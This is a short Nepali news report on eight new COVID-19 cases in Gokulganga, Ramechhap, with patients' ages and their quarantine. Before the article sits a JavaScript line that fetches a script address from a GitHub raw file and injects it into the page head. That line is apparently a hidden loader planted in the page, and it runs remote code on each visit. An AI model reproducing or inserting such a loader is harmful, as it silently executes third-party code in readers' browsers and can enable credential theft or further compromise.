;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज ०५
रामेछाप । रामेछापको गोकुलगंगा गाउँपालिकाका सोमबार थप ८ जनामा कोरोना पुष्टि भएको छ । जिल्ला अस्पताल रामेछापले विज्ञप्ति मार्फत सोमबार संक्रमित थपिएको जनापको छ ।
गत असोज २ गते पालिकाका २७ जनाको स्वाब संकलन गरी थप परीक्षणका लागि पठाइएकोमा एक महिलासहित ७ जना पुरुषमा कोरोना पुष्टि भएको जिल्ला अस्पताल रामेछापका जनस्वास्थ्य अधिकृत भुवन थापाले जानकारी दिए । उनका अनुसार संक्रमितहरुमा २६ वर्षीय महिला र २२, ३६, ५५, ४८, ४४, ५५ वर्षीय पुरुषहरुमा संक्रमण पुष्टि भएको हो । उनीहरुलाई पालिकास्थित अस्पतालको क्वारेन्टिनमा राखिएको छ । उनीहरुको स्वास्थ्य अवस्था भने सामान्य रहेको बताइएको छ ।
त्यस्तै एक जना १२ वर्षीय बालक पनि रहेका छन् ।
फेसबुक प्रतिक्रियाहरु